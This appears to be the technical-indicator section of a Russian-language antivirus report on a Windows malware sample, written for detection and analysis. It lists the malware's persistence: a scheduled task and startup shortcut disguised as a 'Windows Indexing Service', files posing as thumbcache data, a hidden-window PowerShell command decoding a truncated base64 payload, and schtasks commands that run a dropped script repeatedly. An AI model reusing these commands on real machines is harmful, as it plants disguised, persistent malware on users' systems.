Техническая информация
- <SYSTEM32>\tasks\windowsindexingservice
- %APPDATA%\microsoft\windows\start menu\programs\startup\windowsindexingservice.lnk
- C:\users\public\libraries\thumbcache_33.db
- C:\users\public\libraries\thumbcache_33.db
- DNS ASK ho##.##tdietfitness.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'aWYoKChHZXQtVUlDdWx0dXJlKS5OYW1lIC1tYXRjaCAiQ058Uk98UlV8VUF8QlkiKSAtb3IgKChHZXQtV21pT2JqZWN0IC1jbGFzcyB...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'aWYoKChHZXQtVUlDdWx0dXJlKS5OYW1lIC1tYXRjaCAiQ058Uk98UlV8VUF8QlkiKSAtb3IgKChHZXQtV21pT2JqZWN0IC1jbGFzcyB...
- '<SYSTEM32>\schtasks.exe' /delete /TN WindowsIndexingService /f
- '<SYSTEM32>\schtasks.exe' /delete /TN "Windows Indexing Service" /f
- '<SYSTEM32>\schtasks.exe' /create /TN WindowsIndexingService /sc DAILY /st 00:00 /f /RI 16 /du 23:59 /TR "wscript.exe //nologo "C:\Users\Public\Libraries\WindowsIndexingService.js" >NUL 2>&1"